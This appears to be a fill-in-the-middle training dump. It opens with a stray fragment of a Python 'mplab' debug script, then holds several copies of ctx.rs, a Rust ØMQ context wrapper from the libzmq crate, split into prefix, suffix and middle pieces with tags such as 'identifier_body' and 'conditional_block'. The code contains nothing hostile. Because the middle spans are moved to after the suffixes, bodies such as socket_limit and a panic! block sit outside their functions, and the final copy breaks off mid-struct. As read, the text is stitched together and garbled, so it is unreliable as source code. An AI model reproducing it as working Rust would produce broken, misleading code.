global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab | dev.Disconnect() | random_line_split |
|
ctx.rs | //! The ØMQ context type.
use crate::{auth::server::AuthServer, error::*};
use libzmq_sys as sys;
use sys::errno;
use lazy_static::lazy_static;
use serde::{Deserialize, Serialize};
use std::{
os::raw::{c_int, c_void},
ptr, str,
sync::Arc,
thread,
};
lazy_static! {
static ref GLOBAL_CONTEXT: Ctx = Ctx::new();
}
#[derive(Copy, Clone, Debug)]
enum RawCtxOption {
IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` gets interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Useful in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
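///
/// # Example
///
/// A sketch of loading a config from JSON and building a [`Ctx`] from it
/// (assumes a serde backend such as `serde_json` on the caller's side; marked
/// `ignore` so it is not run as a doc test):
///
/// ```ignore
/// use libzmq::*;
///
/// let json = r#"{ "io_threads": 2, "max_msg_size": null, "max_sockets": null, "no_linger": true }"#;
/// let config: CtxConfig = serde_json::from_str(json)?;
/// let ctx = config.build()?;
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// ```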
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentication.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application will have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enough.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds an `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Let's say our app exclusively uses the inproc transport
/// // for messaging. Then we don't need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
| /// A value of `true` indicates that all new sockets are given a
/// linger timeout of zero.
///
pub fn no_linger(&self) -> bool {
!self.raw.as_ref().get_bool(RawCtxOption::Blocky)
}
/// When set to `true`, all new sockets are given a linger timeout
/// of zero.
///
/// # Default
/// The default value is `false`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.no_linger(), false);
///
/// ctx.set_no_linger(true)?;
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_no_linger(&self, enabled: bool) -> Result<(), Error> {
self.raw.as_ref().set_bool(RawCtxOption::Blocky, !enabled)
}
/// Shut down the ØMQ context.
///
/// Context shutdown will cause any blocking operations currently in
/// progress on sockets open within context to fail immediately with
/// [`CtxTerminated`].
///
/// Any further operations on sockets open within context shall fail
/// with [`CtxTerminated`].
///
/// [`CtxTerminated`]: ../error/enum.ErrorKind.html#variant.CtxTerminated
pub fn shutdown(&self) {
self.raw.shutdown()
}
pub(crate) fn as_ptr(&self) -> *mut c_void {
self.raw.ctx
}
}
impl Default for Ctx {
fn default() -> Self {
Self::new()
}
}
impl<'a> From<&'a Ctx> for Ctx {
fn from(c: &'a Ctx) -> Ctx {
c.to_owned()
}
}
| self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
| identifier_body |
ctx.rs | //! The ØMQ context type.
use crate::{auth::server::AuthServer, error::*};
use libzmq_sys as sys;
use sys::errno;
use lazy_static::lazy_static;
use serde::{Deserialize, Serialize};
use std::{
os::raw::{c_int, c_void},
ptr, str,
sync::Arc,
thread,
};
lazy_static! {
static ref GLOBAL_CONTEXT: Ctx = Ctx::new();
}
#[derive(Copy, Clone, Debug)]
enum RawCtxOption {
IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` gets interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() { |
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Useful in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
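///
/// # Example
///
/// A sketch of loading a config from JSON and building a [`Ctx`] from it
/// (assumes a serde backend such as `serde_json` on the caller's side; marked
/// `ignore` so it is not run as a doc test):
///
/// ```ignore
/// use libzmq::*;
///
/// let json = r#"{ "io_threads": 2, "max_msg_size": null, "max_sockets": null, "no_linger": true }"#;
/// let config: CtxConfig = serde_json::from_str(json)?;
/// let ctx = config.build()?;
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// ```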
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentication.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application will have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enough.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds an `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Let's say our app exclusively uses the inproc transport
/// // for messaging. Then we don't need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
/// A value of `true` indicates that all new sockets are given a
/// linger timeout of zero.
///
pub fn no_linger(&self) -> bool {
!self.raw.as_ref().get_bool(RawCtxOption::Blocky)
}
/// When set to `true`, all new sockets are given a linger timeout
/// of zero.
///
/// # Default
/// The default value is `false`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.no_linger(), false);
///
/// ctx.set_no_linger(true)?;
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_no_linger(&self, enabled: bool) -> Result<(), Error> {
self.raw.as_ref().set_bool(RawCtxOption::Blocky, !enabled)
}
/// Shut down the ØMQ context.
///
/// Context shutdown will cause any blocking operations currently in
/// progress on sockets open within context to fail immediately with
/// [`CtxTerminated`].
///
/// Any further operations on sockets open within context shall fail
/// with [`CtxTerminated`].
///
/// [`CtxTerminated`]: ../error/enum.ErrorKind.html#variant.CtxTerminated
pub fn shutdown(&self) {
self.raw.shutdown()
}
pub(crate) fn as_ptr(&self) -> *mut c_void {
self.raw.ctx
}
}
impl Default for Ctx {
fn default() -> Self {
Self::new()
}
}
impl<'a> From<&'a Ctx> for Ctx {
fn from(c: &'a Ctx) -> Ctx {
c.to_owned()
}
}
|
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
| conditional_block |
ctx.rs | //! The ØMQ context type.
use crate::{auth::server::AuthServer, error::*};
use libzmq_sys as sys;
use sys::errno;
use lazy_static::lazy_static;
use serde::{Deserialize, Serialize};
use std::{
os::raw::{c_int, c_void},
ptr, str,
sync::Arc,
thread,
};
lazy_static! {
static ref GLOBAL_CONTEXT: Ctx = Ctx::new(); | IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` gets interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Useful in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
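///
/// # Example
///
/// A sketch of loading a config from JSON and building a [`Ctx`] from it
/// (assumes a serde backend such as `serde_json` on the caller's side; marked
/// `ignore` so it is not run as a doc test):
///
/// ```ignore
/// use libzmq::*;
///
/// let json = r#"{ "io_threads": 2, "max_msg_size": null, "max_sockets": null, "no_linger": true }"#;
/// let config: CtxConfig = serde_json::from_str(json)?;
/// let ctx = config.build()?;
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// ```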
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
